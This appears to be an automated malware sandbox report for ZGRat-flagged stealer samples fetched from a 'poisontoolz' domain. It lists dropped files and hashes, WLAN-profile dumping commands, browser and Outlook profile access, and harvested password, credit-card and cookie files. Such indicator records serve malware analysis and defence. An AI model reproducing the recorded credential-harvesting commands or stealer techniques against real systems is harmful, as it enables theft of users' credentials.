memory/3844-20-0x0000000006C60000-0x0000000006CF6000-memory.dmp
memory/3844-24-0x0000000007EE0000-0x000000000855A000-memory.dmp
memory/2908-39-0x0000000000D80000-0x00000000012F2000-memory.dmp
memory/2908-40-0x00007FFEA6180000-0x00007FFEA6C41000-memory.dmp
memory/2908-41-0x000000001BFE0000-0x000000001BFF0000-memory.dmp
memory/3844-38-0x0000000071ED0000-0x0000000072680000-memory.dmp
C:\Users\Admin\AppData\Roaming\Binded.exe
| MD5 | e447ce4e0dd50659d1ed5328ae95c742 |
| SHA1 | 279e5fe69fdd32158117c272c0ac206b4a393896 |
| SHA256 | 3b6bf86b11ea507fbb214c9ed26210d25f48656b03a7d56134ce63e49c388e41 |
| SHA512 | 7064301eac7ab2e2d2a9cd2d12c0ab236585de5f2d7476b51e00180f7f7de65736a4abfbfbec568768963deea1753b3011a09d50e5a24e3c00a36f840241b86d |
C:\Users\Admin\AppData\Roaming\Binded.exe
| MD5 | 8bf787cd1198e3127190462262c66af7 |
| SHA1 | c3bd6e1278ef871d0804512f3dc27ab8673027f9 |
| SHA256 | efeb073272216decf23b6885215f4cb16a68c631c0054ba411fc32757f1df130 |
| SHA512 | 7f0cf90bd61456f331f078eaf20e91940ab2146aa5905b64ee06dc91bcb07a7da74c864996421942b4f0dd51055f805cc9add964a2136a1b8f2fec6dee982266 |
C:\Users\Admin\AppData\Roaming\Binded.exe
| MD5 | 09379b3c4a2c8d7e740d9418deea490a |
| SHA1 | 305cdfded9fb5a12904fb2712d2f2a989f6814a2 |
| SHA256 | 7833cadca8b516636500eaac8479e6644c06af9dbbd5cd613a2276ba34ac03a1 |
| SHA512 | 116d6d6127b0d32a10ec5ea09d37c627c188727ea3e1df609c8a31e3c332fc56b877d7492ce001c58821c25ccb3d9dd62fbf8cd67e28fb1b27810fbbb29a63ab |
C:\Users\Admin\AppData\Local\Temp\rock.exe
| MD5 | 03bfe4f50a77d2467b47614d34c42fb6 |
| SHA1 | 4e3ab73980dc220bdc9c207788f199b572d488b5 |
| SHA256 | 2072b19de24e8246be2422ba3122cfef2e11e4bcc3ef46bfce22b886f6e168f3 |
| SHA512 | 338fb3ddd309b81bad5af5dbc7f2c60080124736a10d5dee76dba36c2730f20842f69a7e347b82a3285e7b4b937c1688a5064061f5cc02fcb03c2180112a524e |
C:\Users\Admin\AppData\Local\Temp\blbrok.exe
| MD5 | 2af26422ada303194e29a808560b21bf |
| SHA1 | eefb4a2823d85c20862754950027bf316e898310 |
| SHA256 | 46c6fa4a583cf1a287fc09f9bf57bc8e91d817559de7f5c9ce5194a1d32bcc9e |
| SHA512 | 1bbdf1d604ba208f000906722045dd0e3c5aa1655c22e0979d9d4eba41e4bb1c21fcbcef1aeba49f8f9109764d71b2dde2813672fddda2c85784d3bcfdbf435d |
memory/3972-72-0x0000000004CE0000-0x0000000004CF0000-memory.dmp
memory/3972-81-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-87-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-95-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-99-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-101-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-103-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/456-104-0x000001C442E70000-0x000001C442E80000-memory.dmp
memory/3972-108-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-106-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-113-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-115-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-111-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-97-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-93-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-91-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-89-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-85-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-121-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-131-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-143-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-141-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-139-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-137-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-135-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-133-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-129-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-127-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-125-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-123-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-119-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-117-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-83-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/456-288-0x000001C442E80000-0x000001C442ED0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Data\Passwords.txt
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\Data\Histories.txt
| MD5 | 412ec159e4b14be1ca93db473e80acc2 |
| SHA1 | 8909b6f7fc8715a749270b6ceb8f05f823f59fd3 |
| SHA256 | eaff9c24df526e9c884832130bf6de9182fd96f3dcdba33e8e5e7a4ed37f1bbe |
| SHA512 | a90524333fd34d44f5784a90ada19904ea7379de26cae08ffdfd2ee25b3fd5b36c2cbcf7a7e6fc4ff734680ca1ff177ed42df1d4f5583d6a1a89d622c183f0b4 |
C:\Users\Admin\AppData\Local\Temp\Data\Downloads.txt
| MD5 | ae0f7fab163139c661e576fe0af08651 |
| SHA1 | 7545ab94360fd93f2209021b4cecabb92592be27 |
| SHA256 | 832ff6318e2c78ac1907c74f3911f8815b545c16449cbce6753e21fb723cb657 |
| SHA512 | a3e342a3c72c079db96a8d6bb108830c3a772b926be0cf4e5d09ebb09e1babbc7602959bf1f82c8df8764f45479f318c3205114f23c96fd663efa792cff86b8b |
C:\Users\Admin\AppData\Local\Temp\Data\CreditCards.txt
| MD5 | 0f5f7a38759e578c92bcf62c45d80b8a |
| SHA1 | 211e70ede55cce5bf67f685d85cbd030a8517d2b |
| SHA256 | 39059fc9bf3844dacbe329b623ca7a06f72656216dd4e52dc9b938b3d95289dc |
| SHA512 | 8130466f8ee346c0b931a34e63e2e9dc6f4070b85faaa58efdddd4d165fa605457d3137472c5fd09da87b0135a4beb660ee39cb390d78be6f0786950036b205d |
memory/3972-79-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/456-78-0x000001C4285A0000-0x000001C428718000-memory.dmp
memory/2908-77-0x00007FFEA6180000-0x00007FFEA6C41000-memory.dmp
memory/456-76-0x00007FFEA6180000-0x00007FFEA6C41000-memory.dmp
memory/3972-75-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-73-0x0000000004BE0000-0x0000000004CC8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\rock.exe
| MD5 | 55c1e65b9e7ac557b4c076d1b06e975a |
| SHA1 | 66bff0bd3d9a0acd309d2cc345ef20cf0983ce24 |
| SHA256 | 0c5834d8e470877274399911bf41aca8dfe1b78c56b2eef989ae6dda2eb99ddb |
| SHA512 | 1842ef859e86f99b8fc7cf41b7f79d39ef33d9dccb630c1a6b9ddf1723d35905b73a8ae2971554bdd9ccf3a8517f32c08209e45bca842ca519312276c274c7ba |
memory/3972-67-0x0000000000350000-0x00000000003EC000-memory.dmp
memory/3972-69-0x0000000074E00000-0x00000000755B0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\blbrok.exe
| MD5 | f9b52117a18922a656813c19c900e1a0 |
| SHA1 | 5799c4228d6567a1335e338f15c4912eeef0a2a2 |
| SHA256 | 7b60894783f90113c994ca42f60ec47db34e7e99aa01de2e2f7e03b840db304a |
| SHA512 | e7377913c9215fdd2b1be050f225defcd3182b4b9a5a0d4ff2ddb1e6ecc84ee20dfea58fca514819a0206deec8f3ea1ef64c2598b68869f0218ab9cae0c4f921 |
C:\Users\Admin\AppData\Local\Temp\blbrok.exe
| MD5 | f189e88b77130e0dbef360901a49b75f |
| SHA1 | 4889b7a7907d01653e9030e282d00ad637249061 |
| SHA256 | 326ad5539723ddc92995ae4f22ad0d99f8202c7d759d7c65e8204f2303fedd94 |
| SHA512 | db3138ed6f472f52e7e52fce37b4808b27eaa83d5f4d3fbc1bdc8149d2ded7c9a1e3e6bf9bb00fe60a654884d54da0cadfb6fe18cabb972316fb31bd35930f8a |
memory/456-809-0x00007FFEA6180000-0x00007FFEA6C41000-memory.dmp
memory/3972-2327-0x0000000004E00000-0x0000000004E4C000-memory.dmp
memory/3972-2326-0x0000000004D20000-0x0000000004D76000-memory.dmp
memory/3972-2328-0x0000000005100000-0x0000000005154000-memory.dmp
memory/3972-2331-0x0000000074E00000-0x00000000755B0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f0703cbb7d230784f16f051935e13267 |
| SHA1 | ea7120074ca0bd261431e4de812eb853748bf3fb |
| SHA256 | d1eb588b0f67f2f65a69dd3152f9351db6746be59c83d55f104bf31b8f8abf42 |
| SHA512 | 6002a89265a2b33c1c1e51859e2df65a6d207a235c4e17c039362b7d95cafc217a151d5386be42caafe71b24150687001db464f28cdbeaab28dec2468865ce6c |
memory/4704-2340-0x000001E97C9C0000-0x000001E97C9D0000-memory.dmp
memory/4704-2339-0x000001E97C9C0000-0x000001E97C9D0000-memory.dmp
memory/4704-2348-0x00007FFEA6000000-0x00007FFEA6AC1000-memory.dmp
memory/4704-2338-0x00007FFEA6000000-0x00007FFEA6AC1000-memory.dmp
memory/4704-2337-0x000001E97EAB0000-0x000001E97EAD2000-memory.dmp
C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe
| MD5 | 0e103855aba5d5d4e78d92694c113cec |
| SHA1 | f77845a6b5793f276c904de52b03634bfbeea6ae |
| SHA256 | 5713320a6d17f3c597e2dda9ace84f51faa3570323f1ba02a30baa62f07013c0 |
| SHA512 | 9521451b24d5654dd2f11257530bfc116645b7e123a5f55f20f7123707a5e05603f919989a9ddd2f73abe91d22fed434080b509bab15cebdb495006bee476eef |
memory/3756-2352-0x00000000051F0000-0x0000000005200000-memory.dmp
memory/3756-2351-0x0000000074E00000-0x00000000755B0000-memory.dmp
C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe
| MD5 | 00e55127fe6b8edb0071c2a557fab93c |
| SHA1 | 0f9017dcbf0939a341bf4a5f4040fa02dc4affb4 |
| SHA256 | c6631aee4cc4e511bd16289e1abf3cef7668d63d5e0467acf7e22dafcf18caa2 |
| SHA512 | 81e53ae890f520e247ba477bc173e669cef49d9c73ccd2d16695120aee8face53d4f4b3adb79950a7b3bfcd59ebfe1830db33e47e00322ee7d3f800fcab7666b |
memory/5004-4559-0x0000000004F80000-0x0000000004F90000-memory.dmp
memory/5004-4560-0x0000000074E00000-0x00000000755B0000-memory.dmp
memory/3756-4589-0x0000000074E00000-0x00000000755B0000-memory.dmp
memory/4760-6264-0x0000021273120000-0x0000021273130000-memory.dmp
memory/4760-6262-0x00007FFEA6120000-0x00007FFEA6BE1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/4760-6780-0x00007FFEA6120000-0x00007FFEA6BE1000-memory.dmp
memory/3200-6785-0x0000000000F30000-0x0000000000F4C000-memory.dmp
memory/3200-6787-0x00000000058A0000-0x00000000058B0000-memory.dmp
memory/3200-6786-0x0000000074E00000-0x00000000755B0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\wqjqot.exe
| MD5 | f3ed43acd7d035e8c6035c7d65ec60bf |
| SHA1 | 679c01b051cbd42b740a05f0cd2807b16bae5aec |
| SHA256 | 136f29247b40b1cd3e65d093fd0529d6115ade980092b6a950d461b5c046daef |
| SHA512 | fc5b4dd5abc2e8e141b25ed4bd77509a0af1ce24b695e44b563ad93192f74c0dd147e4eb0e9da7052459b4dec975d6c99d842f77dc4e002a3631dc27a9ff4db5 |
C:\Users\Admin\AppData\Local\Temp\wqjqot.exe
| MD5 | 1a9ac8aa754a986cccb6580f1494b813 |
| SHA1 | 3f99084894df1307c1cc22228d22e075d461344e |
| SHA256 | c4c16b46ca26315f46e2fc97dd93646064c9c06098c0aecc1cf3851b4eb4d1b2 |
| SHA512 | 4fdc5869fa38faf95200a70eb069b1ed6987c3085fbad4940b877eebc4b6a723c492ead79938d00843e86f4fc9c40a64c7d4ccd3ea64b7128b763c9300319b8f |
memory/3200-6788-0x00000000062B0000-0x00000000063E6000-memory.dmp
memory/5004-7281-0x0000000004F80000-0x0000000004F90000-memory.dmp
memory/5004-7290-0x0000000074E00000-0x00000000755B0000-memory.dmp
memory/3200-7723-0x00000000063F0000-0x00000000063F1000-memory.dmp
memory/3200-7724-0x00000000064C0000-0x000000000658E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\wqjqot.exe.log
| MD5 | c3941d9fa38f1717d5cecd7a2ca71667 |
| SHA1 | 33b5362675383b58b4166ed9f9a61e5aa6768d2e |
| SHA256 | f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256 |
| SHA512 | 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45 |
memory/1924-7732-0x0000000005380000-0x0000000005412000-memory.dmp
memory/1924-7733-0x00000000054E0000-0x00000000054F0000-memory.dmp
memory/1924-7734-0x0000000006110000-0x000000000611A000-memory.dmp
memory/3200-7731-0x0000000074E00000-0x00000000755B0000-memory.dmp
memory/1924-7730-0x0000000074E00000-0x00000000755B0000-memory.dmp
memory/1924-7729-0x0000000000400000-0x0000000000578000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Data\Cookies.txt
| MD5 | 824ce7c07117a630e9b31638f89476aa |
| SHA1 | 2d012f1cd8b636de1662f69d213b3cf9fa5df846 |
| SHA256 | 4d1a2351c6146b7f0cc87825160516933201af5e737028b360d4ee8d0ca7fdfd |
| SHA512 | 0c0d50920055b3a2343154acbe8e6d1a3490ce7ae403a21a9b385309805338ba05163500439ab85d30d1d2bb5c742009bb2b0c25d74533ba24780d31efe5c945 |
memory/1924-7735-0x0000000008A70000-0x0000000008AC0000-memory.dmp
memory/1924-7775-0x0000000074E00000-0x00000000755B0000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Enumerates physical storage devices
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\down.png
Network
| Country | Destination | Domain | Proto |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.189.79.40.in-addr.arpa | udp |
| GB | 96.16.110.114:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| NL | 52.142.223.178:80 | | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
128s
Max time network
130s
Command Line
Signatures
Detect ZGRat V1
ZGRat
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 640 set thread context of 4480 | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe
"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe"
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
C:\Windows\SysWOW64\netsh.exe
netsh wlan show profile
C:\Windows\SysWOW64\findstr.exe
findstr All
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\netsh.exe
netsh wlan show networks mode=bssid
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | magic.poisontoolz.com | udp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | 90.10.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | evcs-ocsp.ws.symantec.com | udp |
| US | 152.199.19.74:80 | evcs-ocsp.ws.symantec.com | tcp |
| US | 8.8.8.8:53 | 74.19.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.179.17.96.in-addr.arpa | udp |
| US | 20.231.121.79:80 | | tcp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 162.159.133.233:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| IN | 52.140.118.28:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 104.18.115.97:80 | | tcp |
| IN | 52.140.118.28:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 20.166.126.56:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 104.77.160.28:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 104.18.115.97:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 151.80.29.83:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 136.175.8.205:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 104.18.115.97:80 | | tcp |
| N/A | 162.159.133.233:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| GB | 96.16.110.114:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
Files
memory/640-0-0x0000000074CA0000-0x0000000075450000-memory.dmp
memory/640-1-0x0000000000740000-0x000000000075C000-memory.dmp
memory/640-2-0x0000000005100000-0x0000000005110000-memory.dmp
memory/640-3-0x0000000006C00000-0x0000000006E0A000-memory.dmp
memory/640-4-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-5-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-9-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-7-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-11-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-15-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-19-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-23-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-27-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-31-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-35-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-37-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-39-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-43-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-45-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-47-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-49-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-51-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-53-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-57-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-61-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-63-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-65-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-67-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-59-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-55-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-41-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-33-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-29-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-25-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-21-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-17-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-13-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-936-0x0000000002B70000-0x0000000002B71000-memory.dmp
memory/640-938-0x0000000006F80000-0x0000000006FCC000-memory.dmp
memory/640-937-0x0000000007110000-0x00000000072B2000-memory.dmp
memory/640-939-0x0000000007920000-0x0000000007EC4000-memory.dmp
memory/640-945-0x0000000074CA0000-0x0000000075450000-memory.dmp
memory/4480-944-0x0000000074CA0000-0x0000000075450000-memory.dmp
memory/4480-943-0x0000000000400000-0x0000000000592000-memory.dmp
memory/4480-946-0x0000000005710000-0x0000000005776000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Buildcrypt.exe.log
| MD5 | c3941d9fa38f1717d5cecd7a2ca71667 |
| SHA1 | 33b5362675383b58b4166ed9f9a61e5aa6768d2e |
| SHA256 | f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256 |
| SHA512 | 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45 |
memory/4480-947-0x00000000057C0000-0x00000000057D0000-memory.dmp
memory/4480-953-0x0000000006030000-0x0000000006038000-memory.dmp
memory/4480-952-0x0000000006000000-0x0000000006026000-memory.dmp
memory/4480-951-0x0000000005F70000-0x0000000006002000-memory.dmp
memory/4480-955-0x0000000006E60000-0x0000000006E68000-memory.dmp
memory/4480-956-0x0000000006E80000-0x0000000006E9E000-memory.dmp
memory/4480-954-0x0000000006E50000-0x0000000006E5A000-memory.dmp
C:\Users\Admin\AppData\Local\e2bed16f33a1d21c74bd6ea14529f635\Admin@IMXSDNYJ_en-US\Browsers\Firefox\Bookmarks.txt
| MD5 | 2e9d094dda5cdc3ce6519f75943a4ff4 |
| SHA1 | 5d989b4ac8b699781681fe75ed9ef98191a5096c |
| SHA256 | c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142 |
| SHA512 | d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7 |
memory/4480-1013-0x00000000077B0000-0x0000000007842000-memory.dmp
C:\Users\Admin\AppData\Local\e2bed16f33a1d21c74bd6ea14529f635\Admin@IMXSDNYJ_en-US\System\Process.txt
| MD5 | 1ee536f8825f6e2687ef66d381d8f207 |
| SHA1 | 226510773d4cce296c65a148113cc8748dcd2eb5 |
| SHA256 | 17f9cee741ac5c44270e2e06cffe0733c0048eeff575a722552ab3faa60c22e4 |
| SHA512 | 0e7be43674727276b6a1ca1b1b96cca435f9dc1feefce7a150632f171313b365ee59bc842244c6dfaf53b951bff3f9cad781ea70795cfed163db767f50a55e7f |
memory/4480-1113-0x00000000057C0000-0x00000000057D0000-memory.dmp
C:\Users\Admin\AppData\Local\e2bed16f33a1d21c74bd6ea14529f635\Admin@IMXSDNYJ_en-US\System\Apps.txt
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/4480-1148-0x0000000006FE0000-0x000000000705A000-memory.dmp
C:\Users\Admin\AppData\Local\e2bed16f33a1d21c74bd6ea14529f635\Admin@IMXSDNYJ_en-US\System\Apps.txt
